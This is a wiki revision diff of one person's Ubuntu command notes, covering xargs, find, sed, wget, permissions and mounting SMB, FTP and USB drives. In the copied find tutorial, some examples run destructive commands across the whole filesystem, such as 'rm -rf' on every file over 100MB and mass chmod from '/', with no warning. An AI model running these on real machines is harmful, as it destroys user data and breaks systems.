Difference between revisions of "Ubuntu File System Commands"

From rbachwiki
Jump to navigation Jump to search
 
(64 intermediate revisions by the same user not shown)
Line 1: Line 1:
== Xargs ==
== Xargs ==


<pre>
Find all jpgs files in a directory and copy them to another dir
find upload/ -type f -name "*.jpg" -print0 | xargs -I '{}' -0 cp '{}' alljpgs/
 
Read a file.txt and create a directory for each line of the file
Read a file.txt and create a directory for each line of the file
file.txt contents = (each on a separate line) apple oranges pear
file.txt contents = (each on a separate line) apple oranges pear
cat file.txt | sort | uniq | xargs -I {} mkdir -p /var/www/fruits/{}
cat file.txt | sort | uniq | xargs -I {} mkdir -p /var/www/fruits/{}
find dir/ -type f -print0 | xargs -0 chmod 755
find dir/ -type f -print0 | xargs -0 chmod 755
(print0 is used to make sure the null character will separate them and the -0 make sure xargs uses that null charcter
#print0 is used to make sure the null character will separate them and the -0 make sure xargs uses that null charcter
find . -name "*fruit.txt" -print0 | xargs -0 -I {} cp {} /folder/{}.backup
 
Find files in the current directory with fruit in the filename "{}"" is the place holder for the filename. Copy the {} to the specified folder
find . -name "*fruit.txt" -print0 | xargs -0 -I {} cp {} /folder/{}.backup
find . -name "*fruit.txt" -depth 1 -print0 | xargs -0 -I {} rm
#Find files in the current directory with fruit in the filename "{}" is the place holder for the filename. Copy the {} to the specified folder
find . -name "*invoice*" -print0 | xargs -0 grep -li 'outwater' | xargs -I {} cp {} /dir/{}
 
Find all files with the word invoice then send it to grep to search in the files for the text outwater then copy those files to the dir
find . -name "*fruit.txt" -depth 1 -print0 | xargs -0 -I {} rm
</pre>
 
find . -name "*invoice*" -print0 | xargs -0 grep -li 'outwater' | xargs -I {} cp {} /dir/{}
#Find all files with the word invoice then send it to grep to search in the files for the text outwater then copy those files to the dir
 
 
===Copy all images to external hard-drive===
# ls *.jpg | xargs -n1 -i cp {} /external-hard-drive/directory
 
Search all jpg images in the system and archive it.
 
# find / -name *.jpg -type f -print | xargs tar -cvzf images.tar.gz
 
Download all the URLs mentioned in the url-list.txt file
 
# cat url-list.txt | xargs wget –c
 
== Tree Command ==
apt install tree
tree -a
# list dir tree including hidden files
 
tree -f
#To list the directory contents with the full path prefix for each sub-directory and file, use the -f as shown
 
tree -d
or
tree -df
#You can also instruct tree to only print the subdirectories minus the files in them using the -d option. If used together with the -f option, the tree will print the full directory path as shown
 
tree -f -L 2
# You can specify the maximum display depth of the directory tree using the -L option. For example, if you want a depth of 2, run the following command.
 
 
tree -f -P cata*
# To display only those files that match the wild-card pattern, use the -P flag and specify your pattern. In this example, the command will only list files that match cata*, so files such as Catalina.sh, catalina.bat, etc. will be listed.
 
tree -f --du
#Another useful option is --du, which reports the size of each sub-directory as the accumulation of sizes of all its files and subdirectories (and their files, and so on).
 
tree -o filename.txt
#redirect the tree’s output to filename for later analysis using the -o optio
 
== Diff Command ==
== Diff Command ==
<pre>
<pre>
Line 75: Line 118:
== Wget Command ==
== Wget Command ==


<pre>
Download a single file
Download a single file


$ wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz
$ wget http://prdownloads.sourceforge.net/sourceforge/nagios/nagios-3.2.1.tar.gz


Download and store it with a different name.
Download and store it with a different name.


$ wget -O taglist.zip http://www.vim.org/scripts/download_script.php?src_id=7701
$ wget -O taglist.zip http://www.vim.org/scripts/download_script.php?src_id=7701


Download in the Background Using wget -b
Download in the Background Using wget -b
Line 88: Line 130:
For a huge download, put the download in background using wget option -b as shown below.
For a huge download, put the download in background using wget option -b as shown below.


$ wget -b http://www.openss7.org/repos/tarballs/strx25-0.9.2.1.tar.bz2
$ wget -b http://www.openss7.org/repos/tarballs/strx25-0.9.2.1.tar.bz2


Mask User Agent and Display wget like Browser Using wget –user-agent
Mask User Agent and Display wget like Browser Using wget –user-agent
Line 100: Line 142:
First, store all the download files or URLs in a text file as:
First, store all the download files or URLs in a text file as:


$ cat > download-file-list.txt
$ cat > download-file-list.txt


URL1
URL1
Line 112: Line 154:
Next, give the download-file-list.txt as argument to wget using -i option as shown below.
Next, give the download-file-list.txt as argument to wget using -i option as shown below.


$ wget -i download-file-list.txt
$ wget -i download-file-list.txt


Download a Full Website Using wget –mirror
Download a Full Website Using wget –mirror
Line 118: Line 160:
Following is the command line which you want to execute when you want to download a full website and made available for local viewing.
Following is the command line which you want to execute when you want to download a full website and made available for local viewing.


$ wget --mirror -p --convert-links -P ./LOCAL-DIR WEBSITE-URL
$ wget --mirror -p --convert-links -P ./LOCAL-DIR WEBSITE-URL


–mirror : turn on options suitable for mirroring.
–mirror : turn on options suitable for mirroring.
Line 132: Line 174:
You have found a website which is useful, but don’t want to download the images you can specify the following.
You have found a website which is useful, but don’t want to download the images you can specify the following.


$ wget --reject=gif WEBSITE-TO-BE-DOWNLOADED
$ wget --reject=gif WEBSITE-TO-BE-DOWNLOADED


Download Only Certain File Types Using wget -r -A
Download Only Certain File Types Using wget -r -A
Line 144: Line 186:
Download all PDF files from a website
Download all PDF files from a website


$ wget -r -A.pdf http://url-to-webpage-with-pdfs/
$ wget -r -A.pdf http://url-to-webpage-with-pdfs/


FTP Download With wget
FTP Download With wget
Line 152: Line 194:
Anonymous FTP download using Wget
Anonymous FTP download using Wget


$ wget ftp-url
$ wget ftp-url


FTP download using wget with username and password authentication.
FTP download using wget with username and password authentication.


$ wget --ftp-user=USERNAME --ftp-password=PASSWORD DOWNLOAD-URL
$ wget --ftp-user=USERNAME --ftp-password=PASSWORD DOWNLOAD-URL


</pre>
== Move Multiple folders to another directory ==
== Move Multiple folders to another directory ==


<pre>
mv -v /home/user1/Desktop/folder1/* /var/tmp/
mv -v /home/user1/Desktop/folder1/* /var/tmp/


This will move the contents of folder1 to tmp folde
This will move the contents of folder1 to tmp folde
</pre>
 
== Using Grep and find to search through eml files ==  
== Using Grep and find to search through eml files ==  
<pre>
 
Using Grep and Find to search through .eml files for a specific phrase
Using Grep and Find to search through .eml files for a specific phrase


go to the dir in question
go to the dir in question


find . -exec grep -ils 'text to find' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/
find . -exec grep -ils 'text to find' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/


above will find the files and copy them to specified folder
above will find the files and copy them to specified folder


find . -exec grep -ils 'text to find\|more text to find\|even more text' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/
find . -exec grep -ils 'text to find\|more text to find\|even more text' /dev/null {} \; | xargs -I {} cp -p {} /Users/homedir/Desktop/


Above will find multiple search strings
Above will find multiple search strings


find . -type f -name ".DS_Store" -exec rm -f {} \;
find . -type f -name ".DS_Store" -exec rm -f {} \;
 
Above will find Ds filese in current dir and subdir and delete them
 
find . -exec grep -ls 'text to find' /dev/null {} \;
 
find . -exec grep -H 'text to look for {} \;


find . -exec grep -n 'text to look for' /dev/null {} \;
Above will find Ds files in current dir and subdir and delete them


find . -exec grep -n 'yuly' /dev/null {} \; -print >> /Volumes/RAIDset1/1share/text.txt
find . -exec grep -ls 'text to find' /dev/null {} \;
find . -exec grep -H 'text to look for {} \;
find . -exec grep -n 'text to look for' /dev/null {} \;
find . -exec grep -n 'yuly' /dev/null {} \; -print >> /Volumes/RAIDset1/1share/text.txt


list files that contain the name "out"
list files that contain the name "out"


ls -la | grep out
ls -la | grep out


Find files in a dir with a string. the -i is case insensitive -w is exact word
Find files in a dir with a string. the -i is case insensitive -w is exact word


find dirname | grep -i  string
find dirname | grep -i  string
</pre>
 
== SED find and replace ==
== SED find and replace ==
<pre>
 
sed -i (inplace) s (subsitute) /find/replace/ g (global). You can replce the / with any other delimiter eg | or :. eg. if you want to find text "/mac" then you would use : as the delimiter sed -i 's:/mac:mac:g'
sed -i (inplace) s (subsitute) /find/replace/ g (global). You can replce the / with any other delimiter eg | or :. eg. if you want to find text "/mac" then you would use : as the delimiter sed -i 's:/mac:mac:g'


Find and Replace Multiple (add the -e switch
Find and Replace Multiple (add the -e switch
sed -e 's/find/replace/g' -e 's/find/replace/g'
sed -e 's/find/replace/g' -e 's/find/replace/g'
Let us start off simple:
Let us start off simple:
Imagine you have a large file ( txt, php, html, anything ) and you want to replace all the words "ugly" with "beautiful"
Imagine you have a large file ( txt, php, html, anything ) and you want to replace all the words "ugly" with "beautiful"


This is the command:
This is the command:


CODE
sed -i 's/ugly/beautiful/g' /home/bruno/old-friends/sue.txt
sed -i 's/ugly/beautiful/g' /home/bruno/old-friends/sue.txt
 


"sed" edits "-i in place ( on the spot ) and replaces the word "ugly with "beautiful" in the file "/home/bruno/old-friends/sue.txt"
"sed" edits "-i in place ( on the spot ) and replaces the word "ugly with "beautiful" in the file "/home/bruno/old-friends/sue.txt"


Imagine you have a whole lot of files in a directory and you want the same command to do all those files in one go  
Imagine you have a whole lot of files in a directory and you want the same command to do all those files in one go  
Remember the find command ? We will combine the two:
Remember the find command ? We will combine the two:


CODE
$ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g' {} \;
$ find /home/bruno/old-friends -type f -exec sed -i 's/ugly/beautiful/g' {} \;
 


Sure in combination with the find command you can do all kind of nice tricks, even if you don't remember where the files are located !
Sure in combination with the find command you can do all kind of nice tricks, even if you don't remember where the files are located !


Additionally I did find a little script on the net for if you often have to find and replace multiple files at once:


Aditionally I did find a little script on the net for if you often have to find and replace multiple files at once:
<pre>
 
CODE
#!/bin/bash
#!/bin/bash
     for fl in *.php; do
     for fl in *.php; do
Line 238: Line 268:
     rm -f $fl.old
     rm -f $fl.old
     done
     done
</pre>


just replace the "*.php", "FINDSTRING" and "REPLACESTRING" make it executable and you are set.
just replace the "*.php", "FINDSTRING" and "REPLACESTRING" make it executable and you are set.
Line 246: Line 277:
For the lovers of perl I also found this one:
For the lovers of perl I also found this one:


CODE
# perl -e "s/old_string/new_string/g;" -pi.save $(find DirectoryName -type f)
# perl -e "s/old_string/new_string/g;" -pi.save $(find DirectoryName -type f)
</pre>


== Creating ISO File from a folder ==
== Creating ISO File from a folder ==


<pre>
If you want to make an iso file from a directory containing other files and sub-directories via the terminal, you can use the following command:
If you want to make an iso file from a directory containing other files and sub-directories via the terminal, you can use the following command:


mkisofs -o image.iso -R /path/to/folder/
mkisofs -o image.iso -R /path/to/folder/


If you wish to backup the home folder, use this command:
If you wish to backup the home folder, use this command:


mkisofs -o image.iso -R $HOME
mkisofs -o image.iso -R $HOME


== Mount Windows SMB share on linux ==
* apt install cifs-utils
* mkdir /mnt/share
* mount.cifs "//192.168.1.1/windows share" /mnt/share -o user=bob
** use the &quoute when there are spaces in the share name


</pre>
== Mount ftp server as local drive ==
== Mount ftp server as local drive ==
<pre>
1. Installation
1. Installation


First install curlftpfs package. On Debian or Ubuntu it would simple as:
First install curlftpfs package. On Debian or Ubuntu it would simple as:


apt-get install curlftpfs
apt-get install curlftpfs


2. Mount ftp directory
2. Mount ftp directory
What needs to be done next is to create a mount point:
What needs to be done next is to create a mount point:


# mkdir /mnt/my_ftp
# mkdir /mnt/my_ftp


next use curlftpfs to mount your remote ftp site. Suppose my access credentials are as follows:
next use curlftpfs to mount your remote ftp site. Suppose my access credentials are as follows:


username: ftp-user
username: ftp-user
password: ftp-pass
password: ftp-pass
host/IP: my-ftp-location.local
host/IP: my-ftp-location.local
the actual curlftpfs mount command would be:
the actual curlftpfs mount command would be:
 
# curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/
 


# curlftpfs ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/
Caution:
Caution:


Line 293: Line 320:


On Debian you can mount ftp using curlftpfs as a root and this allows only root user to access ftp mount.  No other users are allowed since by default only users that mounts has and access to mount directory. When mounting ftp as a non-root user you may get a following error message:
On Debian you can mount ftp using curlftpfs as a root and this allows only root user to access ftp mount.  No other users are allowed since by default only users that mounts has and access to mount directory. When mounting ftp as a non-root user you may get a following error message:


fuse: failed to open /dev/fuse: Permission denied
fuse: failed to open /dev/fuse: Permission denied
Line 300: Line 325:
Rather that changing permissions of /dev/fuse you can allow other users to access ftp mount directory with an curlftpfs's option allow_other. The command will look similar to the one below:
Rather that changing permissions of /dev/fuse you can allow other users to access ftp mount directory with an curlftpfs's option allow_other. The command will look similar to the one below:


# curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/
# curlftpfs -o allow_other ftp-user:ftp-pass@my-ftp-location.local /mnt/my_ftp/


3. Mount ftp with curlftpfs using /etc/fstab
3. Mount ftp with curlftpfs using /etc/fstab


Since we do not want put any passwords to /etc/fstab file we will first create a /root/.netrc file with a ftp username and password using this format:
Since we do not want put any passwords to /etc/fstab file we will first create a /root/.netrc file with a ftp username and password using this format:
Line 311: Line 334:


login ftp-user
login ftp-user
password ftp-pass
password ftp-pass


Now change permissions of this file to 600:
Now change permissions of this file to 600:


# chmod 600 /root/.netrc
# chmod 600 /root/.netrc


Check uid and gid of your non-root user. This user will have a access to ftp mount directory:
Check uid and gid of your non-root user. This user will have a access to ftp mount directory:


$ id
$ id


In the next step add a following line to your /etc/fstab file ( change credentials for your ftp user ):
In the next step add a following line to your /etc/fstab file ( change credentials for your ftp user ):


curlftpfs#my-ftp-location.local /mnt/my_ftp fuse allow_other,uid=1000,gid=1000,umask=0022 0 0
curlftpfs#my-ftp-location.local /mnt/my_ftp fuse allow_other,uid=1000,gid=1000,umask=0022 0 0


Now mount ftp with:
Now mount ftp with:


mount -a
mount -a
 


</pre>
== Creating Aliases ==
== Creating Aliases ==
<pre>
<pre>
Line 361: Line 381:


For Mac the the .bashrc file is in the Home dir ~ and it's called .bash_profile
For Mac the the .bashrc file is in the Home dir ~ and it's called .bash_profile
</pre>
== Find Command ==
<pre>
Part I – Basic Find Commands for Finding Files with Names
1. Find Files Using Name in Current Directory
Find all the files whose name is tecmint.txt in a current working directory.
# find . -name tecmint.txt
./tecmint.txt
2. Find Files Under Home Directory
Find all the files under /home directory with name tecmint.txt.
# find /home -name tecmint.txt
/home/tecmint.txt
3. Find Files Using Name and Ignoring Case
Find all the files whose name is tecmint.txt and contains both capital and small letters in /homedirectory.
# find /home -iname tecmint.txt
./tecmint.txt
./Tecmint.txt
4. Find Directories Using Name
Find all directories whose name is Tecmint in / directory.
# find / -type d -name Tecmint
/Tecmint
5. Find PHP Files Using Name
Find all php files whose name is tecmint.php in a current working directory.
# find . -type f -name tecmint.php
./tecmint.php
6. Find all PHP Files in Directory
Find all php files in a directory.
# find . -type f -name "*.php"
./tecmint.php
./login.php
./index.php
Part II – Find Files Based on their Permissions
7. Find Files With 777 Permissions
Find all the files whose permissions are 777.
# find . -type f -perm 0777 -print
8. Find Files Without 777 Permissions
Find all the files without permission 777.
# find / -type f ! -perm 777
9. Find SGID Files with 644 Permissions
Find all the SGID bit files whose permissions set to 644.
# find / -perm 2644
10. Find Sticky Bit Files with 551 Permissions
Find all the Sticky Bit set files whose permission are 551.
# find / -perm 1551
11. Find SUID Files
Find all SUID set files.
# find / -perm /u=s
12. Find SGID Files
Find all SGID set files.
# find / -perm /g+s
13. Find Read Only Files
Find all Read Only files.
# find / -perm /u=r
14. Find Executable Files
Find all Executable files.
# find / -perm /a=x
15. Find Files with 777 Permissions and Chmod to 644
Find all 777 permission files and use chmod command to set permissions to 644.
# find / -type f -perm 0777 -print -exec chmod 644 {} \;
16. Find Directories with 777 Permissions and Chmod to 755
Find all 777 permission directories and use chmod command to set permissions to 755.
# find / -type d -perm 777 -print -exec chmod 755 {} \;
17. Find and remove single File
To find a single file called tecmint.txt and remove it.
# find . -type f -name "tecmint.txt" -exec rm -f {} \;
18. Find and remove Multiple File
To find and remove multiple files such as .mp3 or .txt, then use.
# find . -type f -name "*.txt" -exec rm -f {} \;
OR
# find . -type f -name "*.mp3" -exec rm -f {} \;
19. Find all Empty Files
To file all empty files under certain path.
# find /tmp -type f -empty
20. Find all Empty Directories
To file all empty directories under certain path.
# find /tmp -type d -empty
21. File all Hidden Files
To find all hidden files, use below command.
# find /tmp -type f -name ".*"
Part III – Search Files Based On Owners and Groups
22. Find Single File Based on User
To find all or single file called tecmint.txt under /root directory of owner root.
# find / -user root -name tecmint.txt
23. Find all Files Based on User
To find all files that belongs to user Tecmint under /home directory.
# find /home -user tecmint
24. Find all Files Based on Group
To find all files that belongs to group Developer under /home directory.
# find /home -group developer
25. Find Particular Files of User
To find all .txt files of user Tecmint under /home directory.
# find /home -user tecmint -iname "*.txt"
Part IV – Find Files and Directories Based on Date and Time
26. Find Last 50 Days Modified Files
To find all the files which are modified 50 days back.
# find / -mtime 50
27. Find Last 50 Days Accessed Files
To find all the files which are accessed 50 days back.
# find / -atime 50
28. Find Last 50-100 Days Modified Files
To find all the files which are modified more than 50 days back and less than 100 days.
# find / -mtime +50 –mtime -100
29. Find Changed Files in Last 1 Hour
To find all the files which are changed in last 1 hour.
# find / -cmin -60
30. Find Modified Files in Last 1 Hour
To find all the files which are modified in last 1 hour.
# find / -mmin -60
31. Find Accessed Files in Last 1 Hour
To find all the files which are accessed in last 1 hour.
# find / -amin -60
Part V – Find Files and Directories Based on Size
32. Find 50MB Files
To find all 50MB files, use.
# find / -size 50M
33. Find Size between 50MB – 100MB
To find all the files which are greater than 50MB and less than 100MB.
# find / -size +50M -size -100M
34. Find and Delete 100MB Files
To find all 100MB files and delete them using one single command.
# find / -size +100M -exec rm -rf {} \;
35. Find Specific Files and Delete
Find all .mp3 files with more than 10MB and delete them using one single command.
# find / -type f -name *.mp3 -size +10M -exec ls -l {} \;
That’s it, We are ending this post here, In our next article we will discuss more about other Linux commands in depth with practical examples. Let us know your opinions on this article using our comment section.
</pre>
== Set File And Directory Permissions using Find Command ==
<pre>
This wll set all the directores to 755 and all the files to 644
find  -type d -print | xargs chmod 755
find  -type f -print | xargs chmod 644
</pre>
== Permissions on Linux ==
<pre>
File permission symbols
If you run the command
ls -l
in your home directory, you will get a list of files that may include something like this
-rw-r--r--  1  bob  users  1892  Jul 10  18:30 linux_course_notes.txt
This basically says, interpreting this from RIGHT to LEFT that the file, linux_course_notes.txt was created at 6:30 PM on July 10 and is 1892 bytes large. It belongs to the group users (i.e, the people who use this computer). It belongs to bob in particular and it is one (1) file. Then come the file permission symbols.
Let's look at what these symbols mean:
The dashes - separate the permissions into three types
The first part refers to the owner's (bob's) permissions.
The dash - before the rw means that this is a normal file that contains any type of data. A directory, for example, would have a d instead of a dash.
The rw that follows means that bob can read and write to (modify) his own file. That's pretty logical. If you own it, you can do what you want with it.
The second part of the these symbols after the second dash, are the permissions for the group. Linux can establish different types of groups for file access. In a one home computer environment anyone who uses the computer can read this file but cannot write to (modify) it. This is a completely normal situation. You, as a user, may want to take away the rights of others to read your file. We'll cover how to do that later.
After the two dashes (two here because there is no write permissions for the group) come the overall user permissions. Anyone who might have access to the computer from inside or outside (in the case of a network) can read this file. Once again, we can take away the possibility of people reading this file if we so choose.
Let's take a look at some other examples. An interesting place to look at different kinds of file permissions is the /bin directory. Here we have the commands that anybody can use on the Linux system. Let's look at the command for gzip, a file compression utility for Linux.
-rwxr-xr-x  1 root    root        53468 May  1  1999 gzip
As we see here, there are some differences.
The program name, date, bytes are all standard. Even though this is obviously different information, the idea is the same as before.
The changes are in the owner and group. Root owns the file and it is in the group "root". Root is actually the only member of that group.
The file is an executable (program) so that's why the letter x is among the symbols.
This file can be executed by everybody: the owner (root), the group (root) and all others that have access to the computer
As we mentioned, the file is a program, so there is no need for anybody other than root to "write" to the file, so there is no w permissions for it for anybody but root.
If we look at a file in /sbin which are files that only root can use or execute, the permissions would look like this:
-rwxr--r--  1 root    root        1065 Jan 14  1999 cron
'cron' is a program on Linux systems that allows programs to be run automatically at certain times and under certain conditions. As we can see here, only root, the owner of the file, is allowed to use this program. There are no xpermissions for the rest of the users.
We hope you enjoyed this little walk-through of file permissions in Linux. Now that we know what we're looking for, we can talk about changing certain permissions.
chmod
chmod is a Linux command that will let you "set permissions" (aka, assign who can read/write/execute) on a file.
chmod permissions file
chmod permission1_permission2_permission3 file
When using chmod, you need to be aware that there are three types of Linux users that you are setting permissions for. Therefore, when setting permissions, you are assigning them for "yourself", "your group" and "everyone else" in the world. These users are technically know as:
Owner
Group
World
Therefore, when setting permissions on a file, you will want to assign all three levels of permissions, and not just one user.
Think of the chmod command actually having the following syntax...
chmod owner group world FileName
Now that you understand that you are setting permissions for THREE user levels, you just have to wrap your head around what permissions you are able to set!
There are three types of permissions that Linux allows for each file.
read
write
execute
Putting it all together:
So, in laymen terms, if you wanted a file to be readable by everyone, and writable by only you, you would write the chmod command with the following structure.
COMMAND : OWNER : GROUP : WORLD : PATH
chmod read & write read read FileName
chmod 6 4 4 myDoc.txt
Wait! What are those numbers?!?
Computers like numbers, not words. Sorry. You will have to deal with it. Take a look at the following output of `ls -l`
-rw-r--r-- 1 gcawood iqnection 382 Dec 19 6:49 myDoc.txt
You will need to convert the word read or write or execute into the numeric equivalent (octal) based on the table below.
4 – read (r)
2 – write (w)
1 – execute (x)
Practical Examples
chmod 400 mydoc.txt – read by owner
chmod 040 mydoc.txt – read by group
chmod 004 mydoc.txt – read by anybody (other)
chmod 200 mydoc.txt – write by owner
chmod 020 mydoc.txt – write by group
chmod 002 mydoc.txt – write by anybody
chmod 100 mydoc.txt – execute by owner
chmod 010 mydoc.txt – execute by group
chmod 001 mydoc.txt – execute by anybody
Wait! I don't get it... there aren't enough permissions to do what I want!
Good call. You need to add up the numbers to get other types of permissions...
So, try wrapping your head around this!!
7 = 4+2+1 (read/write/execute)
6 = 4+2 (read/write)
5 = 4+1 (read/execute)
4 = 4 (read)
3 = 2+1 (write/execute)
2 = 2 (write)
1 = 1 (execute)
chmod 666 mydoc.txt – read/write by anybody! (the devil loves this one!)
chmod 755 mydoc.txt – rwx for owner, rx for group and rx for the world
chmod 777 mydoc.txt – read, write, execute for all! (may not be the best plan in the world...)
</pre>
</pre>
== Format a drive in bash ==  
== Format a drive in bash ==  
Line 729: Line 425:
</pre>
</pre>


== File Permissions on Unix ==
<pre>
Understanding file permissions on Unix: a brief tutorial
(For files on AFS fileservers, see below)
Every user on a Unix system has a unique username, and is a member of at least one group (the primary group for that user). This group information is held in the password file (/etc/passwd). A user can also be a member of one or more other groups. The auxiliary group information is held in the file /etc/group. Only the administrator can create new groups or add/delete group members (one of the shortcomings of the system).
Every directory and file on the system has an owner, and also an associated group. It also has a set of permission flags which specify separate read, write and execute permissions for the 'user' (owner), 'group', and 'other' (everyone else with an account on the computer) The 'ls' command shows the permissions and group associated with files when used with the -l option. On some systems (e.g. Coos), the '-g' option is also needed to see the group information.
An example of the output produced by 'ls -l' is shown below.
drwx------ 2 richard staff  2048 Jan  2 1997  private
drwxrws--- 2 richard staff  2048 Jan  2 1997  admin
-rw-rw---- 2 richard staff 12040 Aug 20 1996  admin/userinfo
drwxr-xr-x 3 richard user  2048 May 13 09:27 public
Understanding how to read this output is useful to all unix users, but especially people using group access permissions.
Field 1:  a set of ten permission flags.
Field 2:  link count (don't worry about this)
Field 3:  owner of the file
Field 4:  associated group for the file
Field 5:  size in bytes
Field 6-8: date of last modification (format varies, but always 3 fields)
Field 9:  name of file (possibly with path, depending on how ls was called)
The permission flags are read as follows (left to right)
position Meaning
1 directory flag, 'd' if a directory, '-' if a normal file, something else occasionally may appear here for special devices.
2,3,4 read, write, execute permission for User (Owner) of file
5,6,7 read, write, execute permission for Group
8,9,10 read, write, execute permission for Other
value Meaning
- in any position means that flag is not set
r file is readable by owner, group or other
w file is writeable. On a directory, write access means you can add or delete files
x file is executable (only for programs and shell scripts - not useful for data files). Execute permission on a directory means you can list the files in that directory
s in the place where 'x' would normally go is called the set-UID or set-groupID flag.
On an executable program with set-UID or set-groupID, that program runs with the effective permissions of its owner or group.
For a directory, the set-groupID flag means that all files created inside that directory will inherit the group of the directory. Without this flag, a file takes on the primary group of the user creating the file. This property is important to people trying to maintain a directory as group accessible. The subdirectories also inherit the set-groupID property.
The default file permissions (umask):
Each user has a default set of permissions which apply to all files created by that user, unless the software explicitly sets something else. This is often called the 'umask', after the command used to change it. It is either inherited from the login process, or set in the .cshrc or .login file which configures an individual account, or it can be run manually.
Typically the default configuration is equivalent to typing 'umask 22' which produces permissions of:
-rw-r--r-- for regular files, or
drwxr-xr-x for directories.
In other words, user has full access, everyone else (group and other) has read access to files, lookup access to directories.
When working with group-access files and directories, it is common to use 'umask 2' which produces permissions of:
-rw-rw-r-- for regular files, or
drwxrwxr-x for directories.
For private work, use 'umask 77' which produces permissions:
-rw------- for regular files, or
drwx------ for directories.
The logic behind the number given to umask is not intuitive.
The command to change the permission flags is "chmod". Only the owner of a file can change its permissions.
The command to change the group of a file is "chgrp". Only the owner of a file can change its group, and can only change it to a group of which he is a member.
See the online manual pages for details of these commands on any particular system (e.g. "man chmod").
Examples of typical useage are given below:
chmod g+w myfile
give group write permission to "myfile", leaving all other permission flags alone
chmod g-rw myfile
remove read and write access to "myfile", leaving all other permission flags alone
chmod g+rwxs mydir
give full group read/write access to directory "mydir", also setting the set-groupID flag so that directories created inside it inherit the group
chmod u=rw,go= privatefile
explicitly give user read/write access, and revoke all group and other access, to file 'privatefile'
chmod -R g+rw .
give group read write access to this directory, and everything inside of it (-R = recursive)
chgrp -R medi .
change the ownership of this directory to group 'medi' and everything inside of it (-R = recursive). The person issuing this command must own all the files or it will fail.
WARNINGS:
Putting 'umask 2' into a startup file (.login or .cshrc) will make these settings apply to everything you do unless manually changed. This can lead to giving group access to files such as saved email in your home directory, which is generally not desireable.
Making a file group read/write without checking what its group is can lead to accidentally giving access to almost everyone on the system. Normally all users are members of some default group such as "users", as well as being members of specific project-oriented groups. Don't give group access to "users" when you intended some other group.
Remember that to read a file, you need execute access to the directory it is in AND read access to the file itself. To write a file, your need execute access to the directory AND write access to the file. To create new files or delete files, you need write access to the directory. You also need execute access to all parent directories back to the root. Group access will break if a parent directory is made completely private.
AFS Access Control Lists (ACLs)
Files on the central AFS fileservers all have the traditional Unix permissions as explained above, but they are also controlled by Access Control Lists(ACL) which take precedence. They provide access levels more flexible than the user/group/other attribute bits, but they work on the level of complete directories, not files. The command to set and list ACLs is fs.
"fs" is a big ugly command that does lots of things related to AFS filesystems depending on the arguments you call it with.
For details see the man pages for: fs_setacl, fs_listacl, fs_cleanacl, fs_copyacl
For brief help, do (e.g.) "fs help setacl"
The default is to give the same permissions to a new directory as are on the parent directory. In practice, this is usually to give complete rights to the owner of the directory, and lookup rights to any other user (equivalent to execute attribute on a directory).
To render a directory private, the simplest command is:
fs setacl -d DIRNAME -clear -a MYNAME all
- replace DIRNAME with the appropriate directory name (or "." for the current directory, and MYNAME with your login name.
Check it with:
fs listacl DIRNAME
It should reply with:
Access list for DIRNAME is
Normal rights:
  USERNAME rlidwka
(see man fs_setacl for a description of the meaning of the flags "rlidwka")
To explicitly give public read/lookup access, use:
fs setacl -d DIRNAME -a system:anyuser read
This can be abbreviated to
fs sa DIRNAME system:anyuser read
If "fs" is not found, or the man pages are not found, your paths are not set up correctly. I recommend you run /usr/local/bin/mknewdotfiles to correct that.
</pre>
== Wput - uploading file from terminal ==  
== Wput - uploading file from terminal ==  
<pre>
<pre>
Line 870: Line 436:
</pre>
</pre>
== List and Mount a Drive ==
== List and Mount a Drive ==
<pre>
Using mount
Using mount
Get the Information
Get the Information
IconsPage/IconGNOMETerminal.png Sometimes devices don't automount, in which case you should try to manually mount it. First, you must know what device we are dealing with and what filesystem it is formatted with. Most flash drives are FAT16 or FAT32 and most external hard disks are NTFS.
IconsPage/IconGNOMETerminal.png Sometimes devices don't automount, in which case you should try to manually mount it. First, you must know what device we are dealing with and what filesystem it is formatted with. Most flash drives are FAT16 or FAT32 and most external hard disks are NTFS.


sudo fdisk -l
sudo fdisk -l
Find your device in the list, it is probably something like /dev/sdb1. For more information about filesystems, seeLinuxFilesystemsExplained.
Find your device in the list, it is probably something like /dev/sdb1. For more information about filesystems, seeLinuxFilesystemsExplained.


Create the Mount Point
Create the Mount Point
Now we need to create a mount point for the device, let's say we want to call it "external". You can call it whatever you want, just please don't use spaces in the name or it gets a little more complicated - use an underscore to separate words (like "my_external"). Create the mount point:
Now we need to create a mount point for the device, let's say we want to call it "external". You can call it whatever you want, just please don't use spaces in the name or it gets a little more complicated - use an underscore to separate words (like "my_external"). Create the mount point:
 
sudo mkdir /media/external
sudo mkdir /media/external
   
   
Mount the Drive
Mount the Drive
IconsPage/example.png We can now mount the drive. Let's say the device is /dev/sdb1, the filesystem is FAT16 or FAT32 (like it is for most USB flash drives), and we want to mount it at /media/external (having already created the mount point):
IconsPage/example.png We can now mount the drive. Let's say the device is /dev/sdb1, the filesystem is FAT16 or FAT32 (like it is for most USB flash drives), and we want to mount it at /media/external (having already created the mount point):


sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000,gid=100,utf8,dmask=027,fmask=137
sudo mount -t vfat /dev/sdb1 /media/external -o uid=1000,gid=100,utf8,dmask=027,fmask=137
The options following the "-o" allow your user to have ownership of the drive, and the masks allow for extra security for file system permissions. If you don't use those extra options you may not be able to read and write the drive with your regular username.
The options following the "-o" allow your user to have ownership of the drive, and the masks allow for extra security for file system permissions. If you don't use those extra options you may not be able to read and write the drive with your regular username.


Otherwise if the device is formatted with NTFS, run:
Otherwise if the device is formatted with NTFS, run:


sudo mount -t ntfs-3g /dev/sdb1 /media/external
sudo mount -t ntfs-3g /dev/sdb1 /media/external
Unmounting the Drive
Unmounting the Drive
IconsPage/example.png When you are finished with the device, don't forget to unmount the drive before disconnecting it. Assuming /dev/sdb1 mounted at /media/external, you can either unmount using the device or the mount point:
IconsPage/example.png When you are finished with the device, don't forget to unmount the drive before disconnecting it. Assuming /dev/sdb1 mounted at /media/external, you can either unmount using the device or the mount point:


sudo umount /dev/sdb1
sudo umount /dev/sdb1
or:
or:


sudo umount /media/external
sudo umount /media/external
